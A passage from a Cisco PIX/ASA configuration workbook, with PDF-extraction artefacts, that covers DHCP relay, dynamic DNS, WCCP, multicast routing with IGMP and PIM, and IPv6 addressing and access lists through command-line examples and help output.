ascii Configure the option information in ascii after this keyword
hex
Configure the option information as a hexidecimal value after this
keyword
ip
Configure the option information as IP address(es) after this keyword
<cr>
ciscoasa(config)# dhcpd option 150 ip ?
NetworkSims.com
648
Hostname or A.B.C.D
IP address of server 1

(config)# dhcpd option 66 ascii ?
WORD ASCII string without whitespace
(config)# dhcpd option 66 ascii 192.168.0.1
Cisco PIX/ASA Challenge 116

Title: Configuring DHCP Relay Services
Outline
This challenge involves defining DHCP relay, where DHCP requests can be forwarded to a
certain interface. DHCP relay is used to send DHCP requests from clients to a destination
DHCP device. Thus DHCP servers to be placed outside local networks, and the PIX/ASA
device is then used to point to the required server. For DHCP relay, there must be no DHCP
server on the same interface. Also, for security purposes, clients cannot send their DHCP
requests through the PIX/ASA, and all requests must come through it.
Objectives

Enable the DHCP relay service on an interface (dhcprelay enable interfaceName).
Define a timeout for the address negation (dhcprelay timeout seconds).
Define the router gateway address, instead of the DHCP gateway reply to a PIX/ASA
interface (dhcprelay setroute interfaceName). Thus the PIX/ASA device can be made
to be the default gateway, even though the DHCP server has defined another
gateway.
Commands
# config t
(config)# int e0
(config-if)# exit
NetworkSims.com
649
(config)# exit
# show dhcprelay statistics
# show dhcprelay state
Example
# config t
(config)# int e0
(config-if)# exit
(config)# dhcprelay ?
enable
Start a DHCP server task on an interface, but at least one
dhcpdrelay server must be configured before enable is issued
server
Configure dhcprelay server information
setroute Configure the DHCP Relay Agent to change the first default
router address (in the packet sent from the DHCP server) to
the address of the client interface
timeout
Configure timeout, the number of seconds for relay address
negotiation after this keyword
(config)# dhcprelay server ?
Hostname or A.B.C.D IP address of dhcprelay server to which
requests are forwarded
(config)# dhcprelay setroute ?
Available client interface names:
Inf2
Inside
(config)# dhcprelay enable ?
Available interfaces on which relay agent will accept client requests:
Inf2
Inside
(config)# dhcprelay timeout ?
<1-3600> Enter number of seconds for relay address negotiation, default
is 60 seconds
<cr>
(config)# exit
# show dhcprelay statistics
DHCP UDP Unreachable Errors: 0
DHCP Other UDP Errors: 0
Packets Relayed
BOOTREQUEST
0
DHCPDISCOVER
7
NetworkSims.com
650
DHCPREQUEST
DHCPDECLINE
DHCPRELEASE
DHCPINFORM
BOOTREPLY
DHCPOFFER
DHCPACK
3
0
0
0
0
7
3
# show dhcprelay state

Context Configured as DHCP Relay
Interface outside, Not Configured for DHCP
Interface inf, Configured for DHCP RELAY SERVER
Interface Edinburgh, Configured for DHCP RELAY

Title: Configuring Dynamic DNS (DDNS)
Outline
DDNS is a service which integrates DNS and DHCP, where the DHCP service allocates IP
addresses based on physical addressese, while DNS resolves hostnames to IP addresses, or
vice-versa. A DDNS name and address mapping are held within the DHCP server using the
following records:
A RR (Resource Record), which is the name to IP address mapping.

PTR RR record, which maps addresses to names.
The main application of DDNS is where hosts are continually changing their IP address
(such as in mobile applications), and hosts can still find each other. The mapping is thus
held on a DHCP server. The main advantage of DDNS is that a host can notify a DHCP
server of a change of the active DNS configuration of its configured parameters, such as,
typically, for hostnames and addresses. The most common DDNS setups are where the
DHCP client updates the A RR, and the DHCP server updates PTR RR, and where the
DHCP server updates both.
In this example the client updates both A RR and PTR RR for a defined static IP address.
Objectives

Define a static IP address on E0 (the static IP address).
NetworkSims.com
651
Define a DDNS update method for the client to update both the A RR and the PTR
RR using the ddns both command.
Associate the DDNS update method with an interface.
Commands
In this example the hostname is defined as myddns.com, which will associate with an IP
address of 192.168.1.1:
# config t
(config)# ddns update method myddns
(DDNS-update-method)# ddns both
(DDNS-update-method)# exit
(config)# int e0
(config-if)# ddns update myddns
(config-if)# ddns update hostname myddns.com
(config-if)# exit
(config)# exit
Example
# config t
(config)# ddns ?
update Configure dynamic DNS update
(config)# ddns update ?
method Configure dynamic DNS update method
(config)# ddns update method ?
WORD Dynamic DNS update method name
(DDNS-update-method)# ?
Dynamic DNS update method configuration commands:
ddns
IETF standardized Dynamic DNS update
exit
Exit from DNS dynamic update method configuration mode
help
Help for Dynamic DNS update method configuration commands
interval Specify interval between DNS updates
no
(DDNS-update-method)# ddns ?
dynupd-method mode commands/options:
both Update both DNS A and PTR records
<cr>
(DDNS-update-method)# ddns both ?
NetworkSims.com
652

<cr>
(DDNS-update-method)# inter ?
maximum Specify maximum interval between DNS updates
Ethernet IEEE 802.3
Vlan
Catalyst Vlans
<cr>
(DDNS-update-method)# inter max ?
<0-364> Days
(DDNS-update-method)# help ddns
USAGE:
[no] ddns [both]
DESCRIPTION:
ddns
SYNTAX:
both
Update both DNS A and PTR records
(config)# int e0
(config-if)# ddns ?
(config-if)# ddns update ?
WORD
Method name
hostname Dynamic DNS update hostname
(config-if)# ddns update host ?
WORD Update DNS address records for this hostname
(config-if)# ddns u myddns?
<cr>
(config-if)#
(config-if)#
(config-if)#
(config-if)#
(config-if)#
nameif Edinburgh
ip address 192.168.1.1 255.255.255.0
ddns update myddns
ddns update hostname myddns.com
exit
NetworkSims.com
653
(config)# exit

Title: Configuring Dynamic DNS (DDNS) for Client Updates on A RR and PTR RR,
where the DHCP server implements the update request.
Outline
In this example of DDNS, the client updates both A RR and PTR RR and the DHCP server
honors the client update request.

Define a DHCP entry on the interface.
Define that the DHCP client requests that the DHCP does not make any updates
(using dhcp-client update dns server none).
Commands
# config t
(config)# dhcp-client update dns server none
(config)# int e0
(config-if)# ip address dhcp
(config-if)# exit
(config)# exit
Example
# config t
(config)# dhcp-client ?
update Configure automatic updates
(config)# dhcp-client update ?
NetworkSims.com
654
dns
Configure DNS dynamic update information
(config)# dhcp-client update dns ?

server Configure requested server dynamic DNS updates
<cr>
(config)# dhcp-client update dns server ?
both Server updates both (A and PTR) records
none Ask server to perform no updates
(config)# dhcp-client update dns server none
(config)# ddns ?
(config)# ddns update ?
(config)# ddns update method ?
WORD Dynamic DNS update method name
(DDNS-update-method)# ?
Dynamic DNS update method configuration commands:
ddns
exit
Exit from DNS dynamic update method configuration mode
help
Help for Dynamic DNS update method configuration commands
interval Specify interval between DNS updates
no
(DDNS-update-method)# ddns ?
both Update both DNS A and PTR records
<cr>
(config)# int e0
(config-if)# ddns ?
(config-if)# ddns update ?
WORD
Method name
hostname Dynamic DNS update hostname
NetworkSims.com
655

(config-if)# ddns update host ?
WORD Update DNS address records for this hostname
(config-if)# ddns u myddns?
<cr>
dhcp
pppoe
(config-if)# exit
(config)# exit

Title: Configuring Dynamic DNS (DDNS) for Client instructs the server not to update on
A RR and PTR RR.
Outline
In this example of DDNS, the client instructs the server not to update on A RR and PTR RR.

Define a DHCP entry on the interface (using ip address dhcp and dhcp client
update dns server none).
Enable the DHCP server to override client update requests (using dhcpd update dns
both override).
Commands
NetworkSims.com
656
# config t
(config)# dhcpd update dns both override
(config)# int e0
(config-if)# dhcp client update dns server none
(config-if)# exit
(config)# exit
Example
# config t
pixfirewall(config)# dhcpd ?
address
auto_config
dns
keyword
domain
enable
lease
option
wins
keyword
(config)# dhcpd u ?
dns Configure DNS dynamic updates
(config)# dhcpd u d ?
both
Update both A and PTR DNS records
interface Specify interface to which action will apply to
override
Server overrides client request
<cr>
(config)# dhcpd u d b ?
interface Specify interface to which action will apply to
override
Server overrides client request
<cr>
(config)# dhcpd update dns both override
(config)# int e0
NetworkSims.com
657
(config-if)# dhcp c ?
route
Options for routes installed by dhcp
update Dynamically update information
(config-if)# dhcp c u ?
dns Dynamic DNS update configuration
(config-if)# dhcp c u d ?
server Dynamic DNS updates requested of server
<cr>
(config-if)# dhcp c u d s ?
both Server updates both (A and PTR) records
none Ask server to perform no updates
(config-if)# exit
(config)# exit

Title: WCCP (Web Cache Communications Protocol)
Outline
WCCP is a Cisco-derived protocol which stores previously access Web pages in a Webcache, which can then be accessed, rather than the remote page, when users re-request the
page.

Enable WCCP (wccp web-cache).
Define that Web traffic (on port 80) that enters from the outside interface is
redirected to a web cache.
Commands
NetworkSims.com
658
# config t
(config)# int e0
(config-if)# exit
(config)# wccp web-cache
(config)# wccp interface Edinburgh web-cache redirect in
(config)# exit
Example
# config t
(config)# int e0
(config-if)# exit
(config)# wccp ?
<0-254>
Dynamically defined service identifier number
interface Keyword to specify an interface
web-cache Standard web caching service
(config)# wccp web ?
group-list
Set the access-list used to permit group membership
password
redirect-list Set the access-list used to permit redirection
<cr>
(config)# wccp web-cache
(config)# wccp interface ?
Inf2
Inside
(config)# wccp in Edinburgh ?
<0-254>
Dynamically defined service identifier number
(config)# wccp in Edinburgh web-cache ?
redirect Set packet redirection options for the service
(config)# wccp in Edinburgh web-cache redirect ?
in Redirect to a Cache Engine appropriate ingress packets
(config)# wccp in Edinburgh web-cache redirect in ?
<cr>
NetworkSims.com
659
(config)# wccp interface Edinburgh web-cache redirect in

(config)# exit
Cisco PIX/ASA Test (Challenge 121)

Outline
This challenge involves taking a PIX test on DHCP, DDNS and WCCP. The main facts are:
DHCP allocates IP addresses based on client MAC addresses.

DDNS supports the updating of IP information.
WCCP allows Web requests to be forwarded to a web cache, if the page already
exists in the cache.

Title: Multicast Routing
Outline
Multicast allows a sender to send packets to multiple recipients, which is useful in reducing
bandwidth. These use special multicast addresses of 224.0.0.0/4 (Class D), which spans from
224.0.0.0 to 239.255.255.255. Subscribers then join groups using the Internet Group
Management Protocol (IGMP) protocol to alert local multicast routers. IGMP is a fairly
simple protocol and consists of:
A version number.
A type.
A checksum.
Group. This is the multicast address to be joined.
Thus when a multicast packet is sent, the multicast router will then know that at least one of
the host that are interested in receiving packets for a specific multicast address. The router
then requires to implement multicast routing between the routers in order to get the data
packet to the host(s).
Multicast routing protocols typically work on two main methods:
NetworkSims.com
660
Dense mode. This works by flooding data into the network and then pruning back
parts of the tree. This tree represent a set of routers, and the more pruning that is
done, the smaller the tree, and the less bandwidth will be wasted in sending
multicast packets. Thus if there are no branches of interested within an AS, the
border router sends a prune message to the upstream router.
Sparse mode. This uses a Rendezvous Point (RP), where join messages are sent to
the RP's unicast address. It cuts down bandwidth, and is efficient, but requires
careful configuration on devices.
The main multicast routing mechanisms are:
DVMRP (Distance Vector Multicast Routing Protocol). DVMRP uses IGMP sub-code
13, and implements Dense Flooding, which is effective, but not inefficient in its
usage of bandwidth. With this the router floods the whole network at the start, and
then prune back subnets that are not of interest.
PIM (Protocol Independent Multicast). PIM uses IP protocol 103. In dense mode
operation it operates like DVMRP. It implements joins, prunes, and grafts, where a
graft is the opposite of a prune, and adds a branch back onto the tree.
Enable multicast routing. When this is enabled on the device, IGMP Version 2 is
automatically enabled on the interfaces.
Disable IGMP on E1. This is useful in cutting down on excess traffic, if an interface is
not used for multicast traffic.
Commands
# config t
(config)# multicast-routing
(config)# int e0
(config-if)# exit
(config)# int e1
(config-if)# no igmp
(config-if)# exit
Example
# config t
NetworkSims.com
661
(config)# int e0
(config-if)# exit
(config)# int e1
(config-if)# no igmp
(config-if)# exit

Title: Multicast Group Membership
Outline
The PIX/ASA can become part of a multicast group using the IGMP protocol on an interface,
and defining the group-group (igmp join-group address). Also multicast traffic can be sent
to a network segment using a statically joined group (igmp static-group address). The
objectives of this challenge are to:
Enable multicast routing.

Configure the Ethernet ports.
Configure join-group membership on E0. With join-group memberships, the
PIX/ASA accepts and forwards all multicast packets to the defined interface.
Configure static-group membership on E1. With the static-group membership, the
PIX/ASA does not accept multicast packet, but forwards them to the defined
interface.
Show IGMP traffic.
Commands
# config t
(config)# int e0
(config-if)# igmp join-group 224.0.0.1
(config-if)# exit
(config)# int e1
(config-if)# igmp static-group 224.0.0.1
(config-if)# exit
Example
NetworkSims.com
662
# config t
(config)# int e0
(config-if)# igmp ?
access-group
group membership access
forward
forward
join-group
join multicast group
limit
host join limit
query-interval
host query interval
query-max-response-time max query response value
query-timeout
previous querier timeout
static-group
static multicast group
version
version
<cr>
(config-if)# igmp join-group ?
(config-if)# exit
(config)# int e1
(config-if)# igmp static-group ?
(config-if)# exit
(config)# exit
# show igmp traffic
IGMP Traffic Counters
Elapsed time since counters cleared: 00:00:35
Valid IGMP Packets
Queries
Reports
Leaves
Mtrace packets
DVMRP packets
PIM packets
Received
10
5
2
0
0
0
30
Errors:
Malformed Packets
Martian source
Bad Checksums
0
0
0
Sent
4
0
0
0
0
0
0

NetworkSims.com
663
Title: Controlling Access to Multicast Group Membership using Access-lists

Outline
The PIX/ASA can use access-lists to define the groups that hosts will join (using the igmp
access-list listno command on the defined interface).
Enable multicast routing.

Configure an extended access-list which define the hosts that can join multicast
groups.
Define the limit of the number of IGMP host that can join on a per interface basis.
Define the Query Interval, which is the time that the PIX/ASA waits between
sending out messages to discover multicast groups (igmp query-interval time).
Define the Query Timeout, which is the time that the PIX/ASA will wait before it will
assume that it is the designated router and will start sending query messages (igmp
query-timeout time).
Commands
# config t
(config)# access-list 100 permit igmp host 20.10.10.1 host 224.0.0.1
(config)# int e0
(config-if)# igmp access-group 100
(config-if)# igmp limit 20
(config-if)# igmp query-interval 100
(config-if)# igmp query-timeout 100
(config-if)# exit
(config)# int e1
(config-if)# exit
Example
# config t
WORD < 241 char Access list identifier
alert-interval
Specify the alert interval for generating syslog message
106001 which alerts that the system has reached a deny
flow maximum. If not specified, the default value is 300 sec
NetworkSims.com
664
deny-flow-max
Specify the maximum number of concurrent deny flows that can

be created. If not specified, the default value is 4096

deny
ethertype Configure access policy for non IP traffic through the
system when configured in transparent mode
extended
Configure access policy for IP traffic through the system
line
permit
remark
Specify a comment (remark) for the access-list after this
keyword
standard
Use this to configure policy having destination host or network
only
webtype
Use this to configure WebVPN related policy
(config)# access-l 100 permit ?
<0-255>
Enter protocol number (0 - 255)
Hostname or A.B.C.D Match based on destination network address
ah
any
Abbreviation for an address and mask of
0.0.0.0 0.0.0.0
eigrp
esp
gre
host
Use this keyword to configure destination host
icmp
icmp6
igmp
igrp
ip
ipinip
ipsec
nos
object-group
Specify a protocol object-group after this keyword
ospf
pcp
pim
pptp
snp
tcp
udp
(config)# access-l 100 permit igmp ?
Hostname or A.B.C.D Source IP address
any
Abbreviation for source address and mask of
0.0.0.0 0.0.0.0
host
Use this keyword to configure source host
interface
Use interface address as source address
object-group
Network object-group for source address
(config)# access-list 100 permit igmp host 20.10.10.1 host 224.0.0.1
(config)# int e0
NetworkSims.com
665
(config-if)# igmp access-group ?

WORD Named access list specifying access group range
(config-if)# igmp access-group 100
(config-if)# igmp limit ?
<0-500> Number of IGMP hosts that can join
(config-if)# igmp limit 20
(config-if)# igmp query-interval ?
<1-3600> Query interval in seconds
(config-if)# igmp query-interval 100
(config-if)# igmp query-t ?
<60-300> timeout value in seconds
(config-if)# igmp query-timeout 100
(config-if)# exit
(config)# int e1
(config-if)# exit

Title: Enabling and configuring PIM (Protocol Independent Multicast) for Sparse Mode
Outline
With multicast, PIM is used to construct a multicast distribution tree of an IP multicast
group. For this it uses these multicast distribution trees so that data packets from senders to
a multicast group are then forwarded to the receivers which have joined the group. It uses
the following elements:
Rendezvous Point (RP). This is a router is the root of a distribution tree for a
multicast group. Receivers then send join messages for a group, and senders send
their data to the RP so that receivers can thus discover senders, and thus receive data
from them.
Designated Router (DR). There can be several PIM-SM routers on a local network.
One of these, the DR, then acts on behalf of directly connected hosts. An election
process determines the winning interface.
The main methods used in PIM are:
NetworkSims.com
666
Sparse Mode (SM). PIM-SM is the most popular deployment, and is efficient for
routing to multicast groups that may span many subnets. It constructs a tree from
each sender to the receivers in the multicast group. All routers in a common PIM-SM
require to know the RP (Rendezvous Point). The command used for this is pim rpaddress IP. PIM-SM is used when there are very few nodes subscribing to multicast
sessions.
Dense Mode (DM). PIM-DM flooded packets throughout the networks and then
prunes-off the branches where there were receivers exist.
Source Specific Mode (SSM).
Bidirectional Mode (Bidir).
For a multicast group (G), the host joins using IGMP. The router then forwards multicast
packets only to the interfaces where host have joined the group. Designated Routers
(DRs) are then used to send out join/prune messages to a group-specific

Rendezvous Point (RP), for every group in which it has active members. The main

Enable PIM on E0.
Define PIM parameters.
Define a static rendezvous point (RP). The command used is pim rp-address IP.
Define the designated router (DR) priority. The DR must send-out register, join, and
prune messages to the RP. If there is more than one multicast router within a given
network segment, there is an election process, where the higher the value, the higher
the priority. The command used is pim dr-priority value.
Define PIM hello message interval. The DR sends out router query message every 30
seconds. If this is to be changed the command used is pim hello-interval value.
Define PIM join-prune interval. The DR sends out PIM join/prune messages every 60
seconds. If this is to be changed the command used is pim join-prune-interval
value.
Commands
# config t
(config)# int e0
(config-if)# pim
(config-if)# pim join-prune-interval 50
(config-if)# exit
Example
NetworkSims.com
667
# config t
(config)# int e0
Commands
(config-if)# pim ?
dr-priority
PIM Hello DR priority
hello-interval
PIM neighbor Hello announcement interval
join-prune-interval PIM periodic Join-Prune announcement interval
<cr>
accept-register
rp-address
spt-threshold
(config-if)# pim
(config-if)# pim dr-priority ?
<0-4294967295> Hello DR priority, preference given to larger value
(config-if)# pim hello-interval ?
(config-if)# pi join-prune-interval ?
<10-600> Join-Prune interval in seconds
(config-if)# pi join-prune-interval 50
(config-if)# exit
(config)# pim ?
accept-register
rp-address
spt-threshold
(config)# pim accept-register ?
list
Access list
route-map Route-map
(config)# pim old-register-checksum ?
<cr>
NetworkSims.com
668

Hostname or A.B.C.D
Hostname or X:X:X:X::X Ping destination IPv6 address or hostname
<cr>
(config)# pim rp-address ?
Hostname or A.B.C.D IP name or address of Rendezvous Point
(config)# pim spt-threshold ?

Title: Defining a multicast boundary
Outline
A standard ACL can be used to define the limits of a multicast boundary. The main

Enable PIM on E0.
Define a standard ACL.
Apply the ACL to a multicast boundary.
Commands
# config t
(config)# access-list 10 standard permit 10.0.0.1 0.0.0.255
(config)# int e0
(config-if)# multicast boundary 10
(config-if)# exit
Example
# config t
(config)# access-list 10 standard permit 10.0.0.1 0.0.0.255
(config)# int e0
(config-if)# multicast boundary 10
(config-if)# exit
NetworkSims.com
669

Outline
This challenge involves taking a PIX test on multicast routing. The main facts are:
Multicast routing uses Class D addresses, ranging from 224.0.0.0 239.255.255.255.

224.0.0.0 is never assigned to a group.
224.0.0.1 is assigned to all the systems within a given subnet.
IGMP Version is automatically enabled on all the interfaces when multicast routing
is enabled.
The no igmp command is used on an interface to disable multicast routing on an
interface.

Title: IPv6 - Explained
Outline
The RFC2460 specification outlines IPv6, which defines the main changes over IPv4 as:
Expanded addressing capabilities. The size of the IP address will be increased to

128 bits, rather than 32 bits. This will allow for more levels of addressing hierarchy,
an increased number of addressable nodes and a simpler auto-configuration of
addresses. With multicast routing, the scalability is improved by adding a scope field
to the multicast addresses. As well as this, an anycast address has been added so that
packets can be sent to any one of a group of nodes.
Improved IP header format. This tidies the IPv4 header fields by dropping the least
used options, or making them optional.
Improved support for extensions and options. These allow for different encodings
of the IP header options, and thus allow for variable lengths and increased flexibility
for new options.
Flow labeling capability. A new capability is added to enable the labeling of packet
belonging to particular traffic flows for which the sender requests special handling,
such as non-default quality of service or real-time service.
Authentication and privacy capabilities. Extensions to support authentication, data
integrity, and (optional) data confidentiality are specified for IPv6.
NetworkSims.com
670
Autoconfiguration and multiple IP addresses

IPv4 requires a significant amount of human intervention to set up the address of each of
the nodes. IPv6 improves this by supplying autoconfiguration renumbering facilities, which
allows hosts to renumber without significant human intervention.
IPv4 has a stateful address structure, which either requires the user to manually set up the
IP address of the computer or to use DHCP servers to provide IP addresses for a given MAC
address. If a node moves from one subnet to another, the user must reconfigure the IP
address, or request a new IP address from the DHCP. IPv6 supports a stateless
autoconfiguration, where a host constructs its own IPv6. This occurs by adding its MAC
address to a subnet prefix. The host automatically learns which subnet it is on by
communicating from the router which is connected to the network that the host is connected
to.
IPv6 supports multiple IP addresses for each host. These addresses can be either valid,
deprecated or invalid. A valid address would be used for new and existing communications.
A deprecated address could be used only for the existing communications (as they perhaps
migrated to the new address). An invalid address would not be used for any
communications. When renumbering, a host would deprecate the existing IP address, and
set the new IP address as valid. All new communications would use the new IP address, but
connections to the previous address would still operate. This allows a node to gradually
migrate from one IP address to another.
IPv6 header format
Figure 1 shows the basic format of the IPv6 header. The main fields are:
Version number (4 bits) contains the version number, such as 6 for IP Ver6. It is
used to differentiate between IPv4 and IPv6.
Priority (4 bits) indicates the priority of the datagram, and gives 16 levels of
priority (0 to 15). The first eight values (0 to 7) are used where the source is
providing congestion control (which is traffic that backs-off when congestion
occurs). Examples are 0 defines no priority, 1 defines background traffic (such as
netnews) and 2 defines unattended transfer (such as e-mail), 3 (reserved). The other
values are used for traffic that will not back off in response to congestion (such as
real-time traffic). The lowest priority for this is 8 (traffic which is the most willing to
be discarded) and the highest is 15 (traffic which is the least willing to be discarded).
Flow label (24 bits) still experimental, but will be used to identify different data
flow characteristics. It is assigned by the source and can be used to label data packets
which require special handling by IPv6 routers, such as defined QoS (Quality of
Service) or real-time services.
NetworkSims.com
671
Payload length (16 bits) defines the total size of the IP datagram (and includes the
IP header attached data).
Next header this field indicates which header follows the IP header (it uses the
same IPv4). For example: 0 defines IP information; 1 defines ICMP information; 6
defines TCP information and 80 defines ISO-IP.
Hop limit defines the maximum number of hops that the datagram takes as it
traverses the network. Each router decrements the hop limit by 1; when it reaches 0
it is deleted. This has been renamed from IPv4, where it was called time-to-live, as it
better describes the parameter.
IP addresses (128 bits) defines IP address. There will be three main groups of IP
addresses: unicast, multicast and anycast. A unicast address identifies a particular
host, a multicast address enables the hosts within a particular group to receive the
same packet, and the anycast address will be addressed to a number of interfaces on
a single multicast address.
1
Version
9 10 11 12 13 14 15 16
Priority
Flow label
Flow label
Payload length
Next header
Hop limit
Source IP address
Figure 1
IP Ver6 header format
IPv6 addresses do not use the dotted notion and are written in a hexadecimal format, such
as:
114F:0000:0000:0000:0006:0600:4411:CB1D
Often the leading zeros are omitted to give:
114F:0:0:0:6:600:4411:CB1D
This address can be shorted further by converting all zero values to a double colon, to give:
114F::6:600:4411:CB1D
NetworkSims.com
672
These addresses can have certain scopes:
Link-local. These have a scope on the local link (which are the nodes on the same
subnet).
Site-local. These have a scope within the organization (private site addressing).
Global. These have global scope and are IPv6 Internet addresses.
Of the 128 bit global unicast addresses, the format can be viewed as:
Public Topology (48 bits).

Site Topology (16 bits).
Interface ID (64 bits).
Objectives
Define IPv6 on E0 using the autoconfig option for the address (ipv6 address
autoconfig) which enables stateless autoconfiguration, where the interface itself
configures its own address based on the prefixes it receives from Router
Advertisements (using the Modified EUI-64 Interface ID).
Define IPv6 neighbor discovery to learn about neighboring devices.
Define a static IPv6 mapping (if the automated discovery does not work).
Commands
(config)# int e0
(config-if)# ipv6 address autoconfig
(config-if)# ipv6 enable
(config-if)# exit
(config)# int e1
(config-if)# ipv6 address 2001:400:3:1::1/64
(config-if)# ipv6 nd ns-interval 1000
(config-if)# ipv6 nd ra-interval 1000
(config-if)# ipv6 nd reachable-time 100
(config-if)# ipv6 nd prefix 0800::/64
(config-if)# exit
(config)# ipv6 route outside ::/0 2001:400:3:1::1
(config)# ipv6 neighbor fe80:0000 inside 0000.1111.22222
# sh ipv interface
# sh ipv6 route
Step-by-step
(config)#
int e0
NetworkSims.com
673
! The next command defines that the interface builds its own IPv6 address
! based on Router Advertisements:
! The next command enables IPv6 on the interface:

(config-if)# exit
(config)#
int e1
! The next command assigns a global address on the interface, which automatically creates a
! link-local address (using the Interface ID):
(config-if)# ipv6 address 2001:400:3:1::1/64
! The next command enables IPv6 on the interface:

! IPv6 contains a duplicate address detection system. To determine the interval for neighbor
! solicitation message with the following (in this case 1000 milliseconds):
(config-if)# ipv6 nd ns-interval 1000
! The interval between IPv6 router advertisement retransmissions on an interface can be defined
! with:
(config-if)# ipv6 nd ra-interval 1000
! The time that a remote IPv6 node is considered reachable after a reachability confirmation event
! has occurred, is defined with:
! The IPv6 prefix which is included in IPv6 router advertisements is defined with:
(config-if)# ipv6 nd prefix 0800::/64
(config-if)# exit
! To define a default route:
! To define a static entry, if discovery does not work:
(config)# exit
# sh ipv interface
# sh ipv6 route
Example
NetworkSims.com
674
(config)# int e0
(config-if)# ipv6 ?
IPv6 interface subcommands:
address Configure IPv6 address on interface
enable
Enable IPv6 on interface
nd
IPv6 interface Neighbor Discovery subcommands
icmp
interface
neighbor
Neighbor
route
(config-if)# ipv6 address ?
Hostname or X:X:X:X::X IPv6 link-local address
X:X:X:X::X/<0-128>
IPv6 prefix
autoconfig
Obtain address using autoconfiguration
(config-if)# ipv6
(config-if)# ipv6
(config-if)# exit
(config)# int e1
(config-if)# ipv6
(config-if)# ipv6
(config-if)# ipv6
address autoconfig
enable
address 2001:400:3:1::1/64
enable
nd ?

dad
Duplicate Address Detection
ns-interval
Set advertised NS retransmission interval
prefix
Configure IPv6 Routing Prefix Advertisement
ra-interval
Set IPv6 Router Advertisement Interval
ra-lifetime
Set IPv6 Router Advertisement Lifetime
reachable-time Set advertised reachability time
suppress-ra
Suppress IPv6 Router Advertisements
pixfirewall(config-if)# ipv6 nd ns-interval ?
<1000-3600000> Retransmission interval in milliseconds
pixfirewall(config-if)# ipv6 nd p ?
X:X:X:X::X/<0-128> IPv6 prefix x:x::y/<z>
default
Specify prefix default parameters
pixfirewall(config-if)# ipv6 nd ra-interval ?
<3-1800> RA Interval (sec)
msec
Interval in milliseconds
NetworkSims.com
675

pixfirewall(config-if)# ipv6 nd reachable-time ?
<0-3600000> Reachability time in milliseconds
(config-if)# exit
(config)# ipv6 ?
access-list
Configure access policy for IPv6 traffic through the system
enforce-eui64 Enforce correct EUI-64 source address
icmp
interface
neighbor
Neighbor
route
(config)# ipv6 route ?
Inf2
Inside
(config)# ipv r outside ?
X:X:X:X::X/<0-128> IPv6 prefix
(config)# ipv r outside ::/0 ?
Hostname or X:X:X:X::X IPv6 name or address
(config)# ipv6 ?
icmp
interface
neighbor
Neighbor
route
(config)# ipv6 neighbor ?
X:X:X:X::X IPv6 address
(config)# ipv6 neighbor fe80:0000 ?
NetworkSims.com
676

(config)# exit
# sh ipv6 ?
access-list
icmp
interface
neighbor
route
routers
traffic
Show
Show
IPv6
Show
Show
Show
IPv6
hit counters for access policies

ICMPv6 access rules configured on all interfaces
interface status and configuration
IPv6 neighbor cache entries
IPv6 routes
local IPv6 routers
traffic statistics
# sh ipv6 interface
outside is administratively down, line protocol is down
IPv6 is enabled, link-local address is fe80::20d:65ff:fe85:77d9 [TENTATIVE]
No global unicast address is configured
ff02::1
ff02::2
ff02::1:ff85:77d9
inside is administratively down, line protocol is down
IPv6 is enabled, link-local address is fe80::20d:65ff:fe85:77da [TENTATIVE]
Global unicast address(es):
2001:400:3:1::1, subnet is 2001:400:3:1::/64 [TENTATIVE]
ff02::1
ff02::2
ff02::1:ff85:77da
# sh ipv6 route
IPv6 Routing Table - 2 entries
Codes: C - Connected, L - Local, S - Static, R - RIP, B - BGP
U - Per-user Static route
I1 - ISIS L1, I2 - ISIS L2, IA - ISIS interarea
NetworkSims.com
677
O - OSPF intra, OI - OSPF inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2
fe80::/10 [0/0]
via ::, outside
via ::, inside
via ::, inf2
ff00::/8 [0/0]
via ::, outside
via ::, inside
via ::, inf2

Title: Enforcing Modified EUI64 for Interface IDs for IPv6 interfaces
Outline
IPv6 addresses do not use the dotted notion and are written in a hexadecimal format, such
as:
114F:0000:0000:0000:0006:0600:4411:CB1D
Often the leading zeros are omitted to give:
114F:0:0:0:6:600:4411:CB1D
This address can be shorted further by converting all zero values to a double colon, to give:
114F::6:600:4411:CB1D
The unicast address contains 128 bits, and has the following fields:
Field Prefix (FP) field (3 bits). This identifies when the address is unicast, multicast,
and so on). A value of 001 identifies aggregatable global unicasts.
Top-Level Aggregation Identifier (TLA ID field) (13 bits). This is used to identify the
authority responsible for the address at the highest level of the routing hierarchy.
Res field (8 bits). This is reserved so that the TLA or NLA IDs can be expanded for
future use.
NLA ID field (24 bits). This is used to identify ISPs, and can be organized to reflect a
hierarchy, or multitiered relationship, among providers.
SLA ID field (16 bits). This is used by individual organizations in order to defined a
local addressing hierarchy and to identify subnets.
Interface ID field (64 bits) This uses an IEEE EUI-64 format and is a unique ID for
the network interface. In Ethernet-type networks, it uses the 16 bits from the MAC
address of the network port.
The RFC 3513 defines the IPv6 addressing architecture, and defines that all IPv6 addresses,
apart from those beginning with 000, are constructed of a 64-bit Modified EUI-64 format. In
NetworkSims.com
678
this challenge the PIX/ASA is setup to check the received source IPv6 address against the
source MAC address, so that the sending interface has used the Modified EUI-64 format. If it
has not, the packet is dropped, and an error message shown.
Objectives
Define IPv6 on E0.

Enforce Modified EUI-64 Interface IDs on E0.
Commands
(config)# int e0
(config-if)# exit
(config)# ipv6 enforce-eui64 inside
(config)# ipv6 enforce-eui64 outside
Example
(config)# int e0
(config-if)# exit
(config)# ipv6 ?
access-list
icmp
interface
neighbor
Neighbor
route
(config)# ipv6 enforce-eui-64 ?

NetworkSims.com
679
Title: Define an IPv6 ACL

Outline
IPv6 ACLs operate in a same way as normal ACLs, but operate on IPv6 addresses.
Objectives
Define an IPv6 ACL.

Define IPv6 on E0.
Enforce Modified EUI-64 Interface IDs on E0.
Apply an IPv6 ACL onto E0 and E1.
Commands
(config)# ipv6 access-list testing deny ip 3EFE:3031:5::/48 any
(config)# ipv6 access-list testing permit ip any any
(config)# int e0
(config-if)# exit
(config)# access-group testing interface inside
(config)# access-group testing interface outside
Example
(config)# ipv6 ?
access-list
icmp
interface
neighbor
Neighbor
route
(config)# ipv6 access-list ?
(config)# ipv6 access-list testing ?
configure
deny
line
permit
remark
Specify a comment (remark) for the access-list after this keyword
NetworkSims.com
680
(config)# ipv6 a testing deny ?

<0-255>
Enter protocol number (0 - 255)
ah
eigrp
esp
gre
icmp
icmp6
igmp
igrp
ip
ipinip
ipsec
nos
object-group Specify a protocol object-group after this keyword
ospf
pcp
pim
pptp
snp
tcp
udp
(config)# ipv6 access-list testing deny ip ?
X:X:X:X::X/<0-128> Source IPv6 address/prefix
any
Abbreviation for source prefix ::/0
host
Use this keyword to configure source host
